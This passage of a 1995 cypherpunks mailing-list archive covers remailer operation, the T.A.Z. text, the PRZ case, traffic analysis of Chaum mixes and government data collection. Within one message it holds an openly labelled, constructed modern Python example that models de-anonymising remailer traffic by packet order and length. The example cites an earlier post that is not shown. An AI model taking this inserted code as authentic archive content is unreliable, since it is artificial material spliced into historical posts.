I'd also like to get some idea of the amt of resources consumed by a relatively popular remailer -- amt of system loading, disk space devoted to remailing activities, and anything else. I know loading will be hard to quantify in a meaningful way, but for reference my machine is a 486/66 w/32 megs RAM and pretty fast SCSI disks. Just a general idea of how significant the load on such a machine will be would be nice. My SCSI and Ethernet are both fast, and on a PCI bus.
My site is at the moment, I think, relatively secure. I have few users and am sure at the moment nobody has an easily crackable password. I plan to install a fascist password checker soon. I currently have ftpd and fingerd commented out of my inetd.conf. (I plan to put ftpd back, at some point, but really don't like outsiders being able to do a finger @site and find out who is on, how long, how long idle, find out when users last logged on or read their mail, etc. I will probably want to add it back after modifying it or finding a stock one that does what I want.) I have tcp wrappers installed, and have checked on a number of blatant security holes that I know of.

I am worried that once I begin running a remailer, the number of attacks on my machine will increase dramatically. I'd of course like for my data and my users' data to remain private, and believe that a compromised remailer is (obviously) worse than no remailer at all.

What would be nice, before I put up a remailer, would be to have any willing, security-knowledgeable cypherpunk subscribers out there to probe my machine for any really obvious chinks, for security-aware Linux users to point out any Linux or Slackware-specific security holes, etc. Of course I'd want to have a word with anyone willing to probe me before they just went at it... ;)

Linux kernel is currently 1.1.81, which is quite stable for me, and the Slackware distribution is 1.2.0. I'm running sendmail 8.6.9, are there any really terrible vulnerabilities in it any longer from outside the machine? From inside?

Of course, I'm on an Ethernet with others, and have users logging in from other Ethernets, so am vulnerable to sniffers. I don't think it's going to be feasible to install skey here, as a number of my users are extremely non-technical.

I'm also still looking around for what I'm going to run. I'd like for it to be easy to reply to users, but absolutely impossible for me to 'out' anyone under any circumstances.
The encrypted-sender stuff some remailers currently use is probably too ugly for most average joes to want to use, and not as secure as I'd like. It's probably the best available at the moment. This should definitely change.

What I'd *really* like to do would be to write a client and server to make an anonymous pool act like normal email ... this is really the only way I can think of to make replying easy but also to have good security. I'm sort of surprised someone has not done this yet. It'd be pseudonymous, your client would only look at messages for you or for everyone (for your convenience -- of course anyone could look at anything, but it'll all be PGP'ed, so...)

Some really neat things that could be done w/this... for folks willing to trust the server to some degree, cross-referencing of pseudonyms and public keys could be done, allowing joe user to just mail to a pseudonym -- this would be good in cases where one party wishes to hide, while the other has nothing to hide and is possibly very non-technical. He'd have no guarantee that someone wasn't reading his mail to the pseudonymous party, on the way in, but the p.n. party would not have to worry about having his real address cross-referenced, or about the server having the key to decrypt his real (included) address in memory or on disk.

Anon pools are obviously doable right now, with a mailing list, but the inconvenience of using one like this is a real barrier.

An anonymous pool; Usenet-like -- distributed over many machines in many countries, but with pseudonyms instead of "real names" and public keys as addresses. This is definitely doable, right now. NNTP-type servers doing news and mail service. As the scale got larger, we'd of course not want to send everyone's mail to all the servers, but tying a user down only as far as to a given server would probably not be a problem -- look at all the different folks that may use one NNTP server.
Perhaps mail for a given user could be sent to several different servers to keep things muddy.

Mixmaster does not currently run on Linux, is that correct? Anyone know what the problem is, or have an idea what amt of work would be involved in porting it? I'd like to look at this.

Really, though, everything out there is pretty unsatisfactory -- only anonymous pools and DC-nets have the characteristics I'm interested in. Anyone on the list doing any serious work on DC-nets? I find these extremely exciting, and don't see much brainstorming on implementation going on.

regards,
Craig.

From caj at tower.stc.housing.washington.edu Fri Jan 20 04:29:02 1995
From: caj at tower.stc.housing.washington.edu (Craig A. Johnston)
Date: Fri, 20 Jan 95 04:29:02 PST
Subject: remailer questions
In-Reply-To: <199501201209.EAA01188@tower.stc.housing.washington.edu>
Message-ID: <199501201228.EAA01257@tower.stc.housing.washington.edu>

>
> Linux kernel is currently 1.1.81, which is quite stable for me,
> and the Slackware distribution is 1.2.0.

Errata: make that 2.1.0

-Craig

From s675570 at aix1.uottawa.ca Fri Jan 20 05:28:37 1995
From: s675570 at aix1.uottawa.ca (Angus Patterson)
Date: Fri, 20 Jan 95 05:28:37 PST
Subject: T.A.Z. on Disk
In-Reply-To:
Message-ID:

On Fri, 20 Jan 1995, Charles Bell wrote:

>
> > The book "Temporary Autonomous Zone" is available online at wiretap.spies.com
>
> Available how, exactly?

Sorry about that. The hazards of being brief, I guess (never post when you're half asleep). Gopher and ftp work for the same address on this one. /Library/Documents/taz.txt is good for ftp, or try the /Electronic Books at Wiretap heading on the first menu, if you use gopher. The pointers to the other etext sites might lead you to his other stuff (there were two others as far as I can remember).
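
Going back to Lance Cottrell's description, earlier in this digest, of what type 2 remailers add (reordering inside the remailer and indistinguishable messages), the following added example, which is not Mixmaster code and is not from any poster, measures what a passive observer who sees only packet order and length can link in each design. The packet size, header length and traffic are constructed assumptions, and encryption is modelled only as "content is unreadable".

```python
import random

HEADER_LEN = 40    # constructed: bytes of headers a first-generation remailer strips
PACKET_SIZE = 512  # constructed fixed size; not Mixmaster's real packet size


def make_inbound(rng, n):
    """n constructed ciphertexts of distinct lengths, each tagged with its sender id.

    The sender id is ground truth for scoring only; the observer never reads it.
    """
    lengths = rng.sample(range(100, PACKET_SIZE - HEADER_LEN), n)
    return [(sender, bytes(rng.getrandbits(8) for _ in range(HEADER_LEN + size)))
            for sender, size in enumerate(lengths)]


def forward_in_order(inbound):
    """Original remailer: strip headers, forward at once in arrival order."""
    return [(sender, msg[HEADER_LEN:]) for sender, msg in inbound]


def forward_reordered(inbound, rng):
    """Old-style remailer that reorders its batch but does not pad."""
    out = forward_in_order(inbound)
    rng.shuffle(out)
    return out


def pad(payload):
    """Pad to PACKET_SIZE. Real packets are padded before encryption; only length is modelled."""
    if len(payload) > PACKET_SIZE:
        raise ValueError("payload larger than one packet; splitting is not modelled")
    return payload + bytes(PACKET_SIZE - len(payload))


def client_pad(inbound):
    """Type 2 model: the sender's client already emits fixed-size packets."""
    return [(sender, pad(msg)) for sender, msg in inbound]


def mix_fixed_size(padded_inbound, rng):
    """Type 2 model: every packet leaves at PACKET_SIZE, in shuffled order."""
    out = list(padded_inbound)
    rng.shuffle(out)
    return out


def candidates(inbound, outbound, stripped=0):
    """Per outbound packet: the inbound positions that length alone cannot rule out."""
    in_lens = [len(msg) for _, msg in inbound]
    return [{i for i, length in enumerate(in_lens) if length - stripped == len(msg)}
            for _, msg in outbound]


def linked_by_order(inbound, outbound):
    """Fraction of packets linked by assuming the k-th packet out is the k-th packet in."""
    hits = sum(i[0] == o[0] for i, o in zip(inbound, outbound))
    return hits / len(outbound)


def linked_by_length(inbound, outbound, stripped=0):
    """Fraction of outbound packets whose length singles out the correct sender."""
    hits = 0
    for (sender, _), cand in zip(outbound, candidates(inbound, outbound, stripped)):
        if len(cand) == 1 and inbound[next(iter(cand))][0] == sender:
            hits += 1
    return hits / len(outbound)


def compare(n=8, seed=1995):
    """Run all three designs over the same constructed batch of n messages."""
    rng = random.Random(seed)
    inbound = make_inbound(rng, n)
    padded = client_pad(inbound)
    mixed = mix_fixed_size(padded, rng)
    return {
        "in_order/by_order": linked_by_order(inbound, forward_in_order(inbound)),
        "reordered/by_length": linked_by_length(
            inbound, forward_reordered(inbound, rng), HEADER_LEN),
        "type2/by_length": linked_by_length(padded, mixed),
        "type2/min_anonymity_set": min(len(c) for c in candidates(padded, mixed)),
    }


if __name__ == "__main__":
    for name, value in compare().items():
        print(f"{name:26s} {value}")
```

Reordering alone leaves every message linkable by its length; only when all packets are the same size does each outbound packet have the whole batch as its set of possible senders.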
From frissell at panix.com Fri Jan 20 06:22:45 1995
From: frissell at panix.com (Duncan Frissell)
Date: Fri, 20 Jan 95 06:22:45 PST
Subject: Crypto Anarchy/Libertarians in WSJ
Message-ID: <199501201418.AA10378@panix.com>

-----BEGIN PGP SIGNED MESSAGE-----

Today's WSJ Front Page Left Column

Less Is More
Libertarian Impulses Show Growing Appeal Among the Disaffected
When the Government Fails Many Voters are Asking: Who Needs it Anyway?
Mixed Blessing to the GOP

"Mr. Frezza...doesn't just want to cut government: He questions the very need for most of it. He figures that in a world in which computer wizards are close to creating their own private, encrypted digital cash system for making transactions without any government involvement, the need for centralized authority is shriveling."

DCF

*************************************************************************
ATMs, Contracting Out, Digital Switching, Downsizing, EDI, Fax, Fedex, Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone Cards, Quants, Securitization, Temping, Voice Mail.

From dmandl at bear.com Fri Jan 20 06:27:56 1995
From: dmandl at bear.com (David Mandl)
Date: Fri, 20 Jan 95 06:27:56 PST
Subject: T.A.Z. on Disk
Message-ID: <9501201424.AA11493@yeti.bsnet>

> From: blancw at pylon.com
>
> *T.A.Z. = The Autonomous Zone

T.A.Z. = Temporary Autonomous Zone

--Dave.

From dmandl at bear.com Fri Jan 20 06:28:01 1995
From: dmandl at bear.com (David Mandl)
Date: Fri, 20 Jan 95 06:28:01 PST
Subject: T.A.Z. on Disk
Message-ID: <9501201422.AA11305@yeti.bsnet>

There's a Hakim Bey web site with the full text of TAZ and a bunch of other things, including the pamphlet "Radio Sermonettes" and various other essays.
I've got the URL at home, so I can post it to the list tonight (sorry, but it's easier than asking people to email me for it individually). The text, at that site at least, is the absolutely authorized original (from our original files).

I've got other odds and ends by H.B. that have never been made available on the net which I may or may not get around to posting in the next few weeks.

The followup to TAZ (the book), which will probably be called "The No-Go Zone," will be out in about six months. Well, maybe nine...

--Dave.

> From: Angus Patterson
>
> On Fri, 20 Jan 1995, Charles Bell wrote:
>
> >
> > > The book "Temporary Autonomous Zone" is available online at
> wiretap.spies.com
> >
> > Available how, exactly?
> Sorry about that.
> The hazards of being brief, I guess (never post when you're half asleep).
> Gopher and ftp work for the same address on this one.
> /Library/Documents/taz.txt is good for ftp, or try the
> /Electronic Books at Wiretap heading on the first menu, if you use
> gopher. The pointers to the other etext sites might lead you to his other
> stuff (there were two others as far as I can remember).

From mark at unicorn.com Fri Jan 20 06:32:13 1995
From: mark at unicorn.com (Mark Grant)
Date: Fri, 20 Jan 95 06:32:13 PST
Subject: T.A.Z. on Disk
Message-ID:

On Fri, 20 Jan 1995, Angus Patterson wrote:

> I also saw another e-book site that had some more of his stuff, can't
> remember what it was though.

There's some more on the WWW at http://www.uio.no/~mwatz/bey/index.html.

Mark

From jya at pipeline.com Fri Jan 20 06:52:30 1995
From: jya at pipeline.com (John Young)
Date: Fri, 20 Jan 95 06:52:30 PST
Subject: T.A.Z. on Disk
Message-ID: <199501201451.JAA01734@pipe3.pipeline.com>

On Fri, 20 Jan 1995 Mark Grant said:

Another source is via Nesta Stubbs inspirational home page:

http://www.mcs.com/~nesta/home.html

The NO address is referenced by Nesta, stylistically inimicably.
From dmandl at bear.com Fri Jan 20 06:57:52 1995
From: dmandl at bear.com (David Mandl)
Date: Fri, 20 Jan 95 06:57:52 PST
Subject: And another thing (Hakim Bey)
Message-ID: <9501201448.AA13298@yeti.bsnet>

Also, the current issue of "Axcess" magazine (a slick cyber-zine) has an interview with Hakim Bey in which he mentions the cypherpunks as one of the few groups doing something worthwhile in cyberspace, or words to that effect. I'd post the short passage, but the copy emailed to me by the editor was garbled (heh).

--Dave.

From paul at poboy.b17c.ingr.com Fri Jan 20 07:22:13 1995
From: paul at poboy.b17c.ingr.com (Paul Robichaux)
Date: Fri, 20 Jan 95 07:22:13 PST
Subject: EE Times on PRZ
In-Reply-To: <199501180556.VAA25844@jobe.shell.portal.com>
Message-ID: <199501201520.AA03483@poboy.b17c.ingr.com>

-----BEGIN PGP SIGNED MESSAGE-----

Hal wrote about the PRZ case:

> (Sometimes it seems like the gov't is dragging this case out
> intentionally. I believe the uncertainty does have a chilling effect on
> private development of strong crypto, which would be gone if the
> government announced it was not going to pursue the case, or if they did
> bring charges and lost.)

I've been slogging through a book on Dr. Gerald Bull, the semi-notorious gun designer who was assassinated by parties unknown in the midst of helping the Iraqis build several superguns.

In the late '70s, Bull was prosecuted and spent 4 months at the Allentown pen for ITAR violations. His company exported "technical data," shell blanks, and various equipment useful for designing & building howitzers to South Africa.

The prosecuting US Attorney took more than two years from original indictment to the actual trial. It seems that the same mechanism is at work here.

Incidentally, Bull had at least made some effort to check with the Office of Munitions Control about the legality of his exports; a letter he received from them seemed to say that his planned exports were legal.
The judge cited OMC's screwup as a factor affecting the length of sentence.

- -Paul

- --
Paul Robichaux, KD4JZG       | Good software engineering doesn't reduce the
perobich at ingr.com          | amount of work you put into a product; it just
Not speaking for Intergraph. | redistributes it differently.
### http://www.intergraph.com ###

From habs at cmyk.warwick.com Fri Jan 20 08:09:07 1995
From: habs at cmyk.warwick.com (Harry S. Hawk)
Date: Fri, 20 Jan 95 08:09:07 PST
Subject: AT&T IVES chip
In-Reply-To: <9501192243.AA21298@toad.com>
Message-ID: <9501201903.AA04432@cmyk.warwick.com>

> The IVES chip will be used in AT&T cable-TV-boxes this year.
>
> It is available to OEM's for Internet data security applications.
>
> IVES uses algorithms licensed from RSA.

This seems like good news.. e.g., cable systems are installing phone systems on the cable and doing transactions via the cable (pay per view, home shopping, etc.)

A fear of mine was the Clipper was intended as the encryption standard for all of this. Since AT&T appears to have a chip set that uses RSA I consider this good... Assuming it doesn't have escrow, etc.

Recall one of the major current vendors of cable converter boxes has licensed clipper. (I forget which one).

/hawk

From jalicqui at prairienet.org Fri Jan 20 08:19:56 1995
From: jalicqui at prairienet.org (Jeff Licquia)
Date: Fri, 20 Jan 95 08:19:56 PST
Subject: Remailer-on-a-CD
Message-ID: <9501201619.AA01776@firefly.prairienet.org>

Ed wrote:

>If you look out on ftp.netcom.com:/pub/ec/ecarp/linux*, you'll find a bare-
>bones Linux set that will install right in a DOS filesystem (it's a .ZIP file).
>It's intended for SLIP clients, but it could easily be adapted for setting
>up an "instant remailer".

I saw your announcement on comp.os.linux.announce right after suggesting the "instant remailer" idea. (what timing!) Already got it, and plan on playing with it a little bit to see what fun we could have. (5-floppy remailer install, anyone?)

From hfinney at shell.portal.com Fri Jan 20 08:24:38 1995
From: hfinney at shell.portal.com (Hal)
Date: Fri, 20 Jan 95 08:24:38 PST
Subject: traffic analyzing Chaum's digital mix
Message-ID: <199501201624.IAA13926@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

From: Wei Dai
> I have been thinking about the problem of traffic analysis of a
> remailer.
> [...]
> The basic approach is to use this raw traffic information to calculate a
> SCORE for each user of the remailer with respect to Alice, where the
> user with the highest SCORE is the person Alice is most probably
> communicating with. The idea is that with a Chaumian mix, every time
> Alice sends a message to Bob there is always a pattern of Alice sending
> a message to the mix, followed by Bob receiving a message from the mix
> during the next batch. By counting the number of such correlations for
> each user over a period of time, and taking into account the fact that
> users who receive more messages from the mix will have higher numbers
> of coincidental correlations, a SCORE can be calculated so that it would
> be a good indication over the long run of the probability that a particular
> user is communicating with Alice.

This sounds like a good idea. It was very interesting to see your earlier result on the impact of dummy messages on this approach. Even a relatively small number of batches without dummy messages allows continual accumulation of incriminating information.

I know that the Eurocrypt 89 proceedings had some articles on cryptanalyzing Chaum's mixes. My library has an excellent crypto selection but is missing this volume.
Can anyone who has read this say whether there is anything in those papers that isn't obvious?

Another interesting aspect of your analysis is the possible role of latency. Earlier I had thought of latency as primarily a way of doing mixing, an alternative or addition to batching which mixes messages without holding them up quite as much. But in terms of this in/out analysis latency could play a part in blurring the batch boundaries, adding more uncertainty and making the job of the analyst harder so he would need more data to establish his scores.

Hal

From jalicqui at prairienet.org Fri Jan 20 08:27:16 1995
From: jalicqui at prairienet.org (Jeff Licquia)
Date: Fri, 20 Jan 95 08:27:16 PST
Subject: The Remailer Crisis
Message-ID: <9501201626.AA03495@firefly.prairienet.org>

James wrote:

>Now this is OK if one wishes to run linux, and have a
>remailer as one hobby in addition to the main use of the
>box, but it is still a bit much to pay for a dedicated
>remailer.
>
>Now I just do not like linux. Sure it is a great
>operating system but it will not run codewright
>
>(Vi causes mental degeneration. Even though I detest,
>loathe, and hate vi, vi takes up so much brainspace that
>I find myself issuing vi commands in editors that I
>use much more, and vastly prefer to vi. Vi is evil.)
>
>Therefore there is no way in the world I am going to
>waste a full internet connection and a PC on linux.

Would it be better if you didn't have to dedicate your box to Linux, but just ran it every so often when you weren't playing with Codewright? If you had some store-and-forward mail system (like UUCP or Fido), you wouldn't need to say goodbye to DOS/Windows.

I envision a setup right now where you could (if you wanted) type "remailer" at the DOS prompt to bring the remailer up.
The screen would show a monitor-type program, with a menu option to "R)eboot" to DOS again (or you could just hit Ctrl-Alt-Del).

Oh, and I'd probably package a much nicer editor than vi with it. Believe it or not, the state of Unix editors has progressed beyond vi (and even emacs). But that's assuming you'd need to pull up an editor at all...

From jya at pipeline.com Fri Jan 20 08:39:48 1995
From: jya at pipeline.com (John Young)
Date: Fri, 20 Jan 95 08:39:48 PST
Subject: Crypto Anarchy/Libertarians in WSJ
Message-ID: <199501201639.LAA14304@pipe3.pipeline.com>

On Fri, 20 Jan 1995 frissell at panix.com (Duncan Frissell) said:

Duncan aptly points to the WSJ article, lots of c'punk topics mentioned.

For email copy send blank message with subject: LIB_yep

Meanwhile, here's a taste:

Mr. Willis says the libertarian concept has particular appeal to people in the computer industry. "We have more members in one computer company in Seattle than in some whole counties, and that company is Microsoft," he says.

Indeed, when Mr. Frezza, the Philadelphia computer consultant, last month launched a computer network of like-minded thinkers called DigitaLiberty, he was so overwhelmed with responses, especially from college students, that he had to temporarily shut down the group's electronic mailbox.

One member of DigitaLiberty is Bruce Fancher, a 23-year-old who in the late 1980s earned brief notoriety as a hacker who broke into computer systems, though he was never charged with a crime. He is president of a computer communications company called Phantom Access Technologies Inc. "Being involved in computers or the Internet, you inevitably move toward being a libertarian," he says. "It is basically possible to keep all of your secrets from prying eyes, particularly the prying eyes of the federal government."
From turcotte at io.com Fri Jan 20 08:48:00 1995
From: turcotte at io.com (Brett Turcotte)
Date: Fri, 20 Jan 95 08:48:00 PST
Subject: "Disclosing" private email
Message-ID: <199501201647.KAA01769@pentagon.io.com>

Arthur Chandler posted to the list:

> Greetings! I'd like to solicit your/our best thoughts on the following
> message. San Francisco State University is considering a policy of
> "disclosing" private email to outside agencies. I'm aware that such a
> policy is yet another argument for using crypto; and the last cypherpunks
> meeting gave some encouraging instances of "transparent" encryption
> schemes that are not a hassle or a fear-barrier for newbies.
> But if you could post or private email me your thoughts about the
> legal/ethical aspects of "disclosure," I'd be much obliged.
> I've put a few of my own concerns at the end of the enclosed quote.
>

It is probably a CYA move on the part of the University....if someone at SFSU is plotting the overthrow of our (or any other) government, engaging in espionage, child porn, etc. and using their Internet account, SFSU admin probably wants a way that they don't get held liable. However, my view of this is that it sucks.

>
> ---------- Forwarded message ----------
>
> >From: "Deirdre C. Donovan"
> >
> >I am rewriting the information handouts which we here in San Francisco
> >give out to our students when they apply for Internet access accounts.
> >The issue with which I am struggling is one of privacy. I have heard of
> >universities (anecdotally only) where the administration reserves the
> >right to read E-mail. Here, we are leaning more toward something like the
> >paragraph below, which is taken verbatim from an Indiana University draft
> >document.
> >
> >    IU computing centers will maintain the confidentiality of all
> >    information stored on their computing resources. Requests for
> >    disclosure of confidential information will be reviewed by the
> >    administrator of the computer system involved. Such requests
> >    will be honored only when approved by University officials
> >    authorized by the [President] of the campus involved, or when
> >    required by state or federal law. Except when inappropriate,
> >    computer users will receive prior notice of such disclosures.
> >
>
> I'm uneasy about the chain of "prior notice":
>
> 1) Does this policy give university administrators the power to read
> private email before the decision is made to "disclose" it to outside
> persons or agencies?
>

It would have to...otherwise how would they know if they needed to disclose it.

> 2) Does this "prior notice" mean "We're going to do it" or "We plan to do
> it, and if you disagree, let's discuss it before we release it"?
>

From their perspective, prior notice would probably mean they tell you before they do it. While I don't have experience specifically with SFSU, it seems as though large organizations tend to do whatever they please.

> 3) What constitutes "inappropriate"?
>

Probably anything that is involved in an active criminal investigation.

Note that any thing in this message is just my opinion, and most assuredly could prove to be different when exposed to the real world!!

Brett Turcotte
turcotte at io.com

From adam at bwh.harvard.edu Fri Jan 20 09:03:27 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Fri, 20 Jan 95 09:03:27 PST
Subject: T.A.Z. on Disk
In-Reply-To:
Message-ID: <199501201702.MAA23498@bwh.harvard.edu>

| Of course, one could always just buy them on paper (remember that?)

Actually, you can't (right now.) The publisher is out of stock, expects to get more in in March.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From jya at pipeline.com Fri Jan 20 09:07:23 1995
From: jya at pipeline.com (John Young)
Date: Fri, 20 Jan 95 09:07:23 PST
Subject: IBM Contra Beltway
Message-ID: <199501201706.MAA17161@pipe3.pipeline.com>

Duncan or others may give a more elegant report on the Clipper debate here in NYC last night.
My pleasant surprise was to see the IBM rep, William Whitehurst, far outpace the inside the beltway types, EFF's Daniel Weitzer, the White House's Michael Nelson, FBI's Kallstrom and ex-NSA Stewart Baker, as well as the local urbane handsome attorney-mathematician moderator, Albert Wells, who baby-talked the suits through the arcana.

Mr. Whitehurst showed more intelligence about crypto -- domestically, politically, economically and politically -- than any of the others. No flash, no preening, just hard-nosed reports on what's happening, and what's not, due to USG cupidity, with the international spread of the heinous munition.

He said industry is impatiently waiting for the USG to cooperate or get the fuck out of the way. Well, not quite, but close.

The others seemed entranced by the domestic political morass. Kallstrom recited the oft-ridden horse-threats, some miscreant clapped, and he said, "child pornographer". All laughed or winced or stared in pin-striped disbelief at the disrespect shown.

Mr. Weitzer recited that the crypto genie is out of the bottle. Kallstrom said over my dead body or something like that, glowering at the crowd.

The dapper man in front of me pulled up his sock to show his ankle holster. Protecting the nation's chief protector against high-criminals.

I ran out before getting plugged "accidentally".

From adam at bwh.harvard.edu Fri Jan 20 09:10:05 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Fri, 20 Jan 95 09:10:05 PST
Subject: traffic analyzing Chaum's digital mix
In-Reply-To: <199501201624.IAA13926@jobe.shell.portal.com>
Message-ID: <199501201708.MAA23560@bwh.harvard.edu>

| -----BEGIN PGP SIGNED MESSAGE-----
|
| From: Wei Dai
| > I have been thinking about the problem of traffic analysis of a
| > remailer.
| > [...]
| > The basic approach is to use this raw traffic information to calculate a
| > SCORE for each user of the remailer with respect to Alice, where the
| > user with the highest SCORE is the person Alice is most probably
| > communicating with. The idea is that with a Chaumian mix, every time
| > Alice sends a message to Bob there is always a pattern of Alice sending
| > a message to the mix, followed by Bob receiving a message from the mix
| > during the next batch. By counting the number of such correlations for

| This sounds like a good idea. It was very interesting to see your
| earlier result on the impact of dummy messages on this approach. Even a
| relatively small number of batches without dummy messages allows
| continual accumulation of incriminating information.

It would seem that Alice can protect Bob (or Bob can protect himself) by engaging in multiple conversations through the mix.

I was thinking earlier about the concept of bit buckets; people who agree to get mail that they ignore. Alice could, when talking to Bob, send copies along the way to Fred, George, and Harry, each of whom would be running a mailbot that sees the mail is not for them, and deletes it (or, perhaps better, generates a response of encrypted nonsense to flow through the mix for a while.)

Adam

--
"It is seldom that liberty of any kind is lost all at once."
-Hume From xpat at vm1.spcs.umn.edu Fri Jan 20 10:45:38 1995 From: xpat at vm1.spcs.umn.edu (xpat at vm1.spcs.umn.edu) Date: Fri, 20 Jan 95 10:45:38 PST Subject: IRS to keep unreviewable secret dossiers on US citizens Message-ID: <9501201845.AA09218@toad.com> Excerpts from : St Paul Pioneer Press, Jan 29, 1995 "IRS plans to collect more data on individuals to nab tax cheats" a "vast expansion of secret computer database of information it keeps on virtually all Americans" will include "credit reports, news stories, tips from informants, and real estate, motor vehicle and child support records, plus conventional Govt financial data" "Any individual who has business and/or financial activities can expect upgraded agency reports to be put to IRS auditors promptly" Here's the kicker: "Although agency officials concede that some of the data collected will be inaccurate, taxpayers will not be allowed to review or correct it" ^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^ So much for the FOIA. ------------------------------------------------------------------------ P M Dierking | From perry at imsi.com Fri Jan 20 10:48:26 1995 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 20 Jan 95 10:48:26 PST Subject: IP security drafts Message-ID: <9501201842.AA19064@webster.imsi.com> The latest version of the proposal Bill Simpson and I have made for the IPv4 security protocols (which are more or less the same as the IPng proposals) are now available from the internet drafts directories near you. Perry From perry at imsi.com Fri Jan 20 11:00:02 1995 From: perry at imsi.com (Perry E. 
Metzger) Date: Fri, 20 Jan 95 11:00:02 PST Subject: IRS to keep unreviewable secret dossiers on US citizens In-Reply-To: <9501201845.AA09218@toad.com> Message-ID: <9501201859.AA06028@snark.imsi.com> xpat at vm1.spcs.umn.edu says: > Excerpts from : St Paul Pioneer Press, Jan 29, 1995 > > Here's the kicker: "Although agency officials concede that some of > the data collected will be inaccurate, taxpayers will not be allowed > to review or correct it" ^^^^^^^^^^^^^^^^^^^ > ^^^^^^^^^^^^^^^^^^^^^^^ > So much for the FOIA. The privacy act and FOIA make that more or less illegal -- if they are keeping information on you, with certain law enforcement related exceptions they have to let you see it. Perry From bdolan at well.sf.ca.us Fri Jan 20 11:20:54 1995 From: bdolan at well.sf.ca.us (Brad Dolan) Date: Fri, 20 Jan 95 11:20:54 PST Subject: Cone order? Message-ID: <199501201920.LAA26763@well.sf.ca.us> Are these two stories related? Associated Press reports on 1/20/95: >Hewlett-Packard Co. has been awarded a $672 million contact to build a >computer system linking 20,000 terminals for the military, Sen. Bob Smith >announced. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - It was previously reported: >From rsalz at osf.org >Date: Thu, 19 Jan 95 14:25:01 -0500 >From: Rich Salz >To: cypherpunks at toad.com >Subject: Re: Cone of silence update > >---------- Begin Forwarded Message ---------- >Date: Wed, 18 Jan 95 21:03:02 -0500 >From: burton at het.brown.edu (Joshua W. Burton) >To: silent-tristero at world.std.com >Subject: Cone of silence update [...] >GOVERNMENT'S SECRETS FLOW THROUGH AN INTERNET CLONE > >WASHINGTON - When the US intelligence community recently decided to >modernize the way it communicates, it did what countless other >government agencies, businesses and individuals have done over the >last few years: it turned to the Internet. > >But the regular Internet wouldn't do. 
For spies and other government
>officials concerned about secrecy, that very public, very uncontrollable
>global mesh of computer networks was too risky a place to do business.
>
>So the intelligence community created its own Internet.
>
>Dubbed Intelink and based on the same technology used to run and
>navigate the original Internet, this new network for sharing supersecret
>information---including satellite imagery and video footage---officially
>began operating just a few weeks ago.
>
>When the bugs are worked out and a final system is in place, it will
>allow analysts, policy-makers, military officials and soldiers in the
>field to tap quickly and directly into classified information at the
>Central Intelligence Agency, the National Security Agency, the Pentagon
>and diverse other parts of the national security bureaucracy.

[...]

From SADLER_C at HOSP.STANFORD.EDU Fri Jan 20 11:31:52 1995
From: SADLER_C at HOSP.STANFORD.EDU (Connie Sadler)
Date: Fri, 20 Jan 95 11:31:52 PST
Subject: IRS "DataBase"
Message-ID:

In reference to the IRS database, I heard this announced on the radio this morning - that the database has existed for years and that it is being worked currently rather enthusiastically. The news announcer somewhat exaggerated the comment that followed which seemed to make clear the fact that we members of "John Q. Public" would NOT have access to these records to review or correct them. The DJ and others picked it up and talked about it afterwards and obviously did not approve. I believe that the IRS is exempt from many laws, so is this for real???

Digital Cash? Probably. Anonymous Buying? Wishful Thinking? Why not just get 10% tax from everyone and be done with it?

Connie

From chen at intuit.com Fri Jan 20 11:32:04 1995
From: chen at intuit.com (Mark Chen)
Date: Fri, 20 Jan 95 11:32:04 PST
Subject: Electronic cash illegal?
(fwd)
Message-ID: <9501201930.AA01571@doom>

Derek writes:
> > As far as I know, the legal definition of a "dollar" in the US is still a
> > certain weight of silver, and payment in silver legally satisfies debts;
> > under current silver prices, that probably costs more than a
> > $1 US Federal Reserve Note, so nobody bothers.
>
> Uhh, no, US currency does not have any backing. I believe it was
> Nixon who stopped it, possibly even earlier than him. There _used_ to
> be Gold- and Silver-backed dollars, but no longer.

Correct. Nixon dismantled the Bretton Woods system in (I think) '71.

--
Mark Chen
chen at intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D

From bdolan at well.sf.ca.us Fri Jan 20 11:35:53 1995
From: bdolan at well.sf.ca.us (Brad Dolan)
Date: Fri, 20 Jan 95 11:35:53 PST
Subject: *More* wiretaps?
Message-ID: <199501201935.LAA03670@well.sf.ca.us>

Associated Press reported on 1/20/95:

>Secretary of State Warren Christopher Friday announced
>plans to combat narcotics smuggling and terrorism with tougher
>laws and sentences and tighter control on visas for entering the
>United States.
>
>A senior State Department official said wiretapping was among the
>measures to be proposed to the Republican-controlled Congress. The
>official said there were ways to use wiretaps without violating
>Supreme Court restrictions.

Since wiretapping on court order from their no-questions-asked secret court is already allowed, can they mean anything other than wiretapping without court order?

Can somebody explain to me why the Clinton administration is considered "liberal"? Why the Republicans are considered "conservative"?

From chen at intuit.com Fri Jan 20 11:39:14 1995
From: chen at intuit.com (Mark Chen)
Date: Fri, 20 Jan 95 11:39:14 PST
Subject: The Remailer Crisis
In-Reply-To: <199501200033.QAA10651@largo.remailer.net>
Message-ID: <9501201936.AA01622@doom>

> From: frissell at panix.com (Duncan Frissell)
>
> I offer to pay for and operate a remailer account on any system that will
> have me.
>
> best.com, based in Mt. View, CA. Mail to postmaster at best.com, or try
> the other standard extensions.

As it happens, I just signed up for a SLIP account at Best. I'm using their standard dial-up service, but they also offer a dedicated 28.8 connection for $450 setup and $60/mo.

--
Mark Chen
chen at intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D

From perry at imsi.com Fri Jan 20 11:50:26 1995
From: perry at imsi.com (Perry E. Metzger)
Date: Fri, 20 Jan 95 11:50:26 PST
Subject: Electronic cash illegal? (fwd)
In-Reply-To: <9501201930.AA01571@doom>
Message-ID: <9501201950.AA06204@snark.imsi.com>

Re-read what was originally written carefully -- it claims neither that the dollar is backed nor that paper dollars are exchangeable for silver.

.pm

Mark Chen says:
> Derek writes:
> > > As far as I know, the legal definition of a "dollar" in the US is still a
> > > certain weight of silver, and payment in silver legally satisfies debts;
> > > under current silver prices, that probably costs more than a
> > > $1 US Federal Reserve Note, so nobody bothers.
> >
